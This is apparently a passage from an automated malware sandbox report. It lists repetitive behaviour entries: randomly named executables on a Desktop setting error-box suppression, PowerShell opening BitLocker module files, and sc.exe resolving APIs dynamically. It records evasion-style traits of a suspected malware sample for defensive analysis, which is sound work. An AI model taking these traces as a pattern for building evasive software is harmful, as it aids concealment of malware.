                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B21F30 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,63_2_0000017CD5B21F30
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
